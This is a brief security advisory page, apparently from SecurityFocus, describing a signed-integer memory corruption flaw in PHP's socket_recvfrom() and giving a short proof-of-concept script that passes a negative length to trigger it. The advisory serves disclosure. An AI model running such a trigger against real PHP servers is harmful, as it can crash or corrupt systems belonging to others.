PHP socket_recvfrom() Signed Integer Memory Corruption Vulnerability

The following proof of concept was provided:

<?php
$buf = "";
$name = "";
socket_recvfrom(socket_create(AF_INET, SOCK_STREAM, 0), $buf, -3, 0,
$name);
?>


 

Privacy Statement
Copyright 2010, SecurityFocus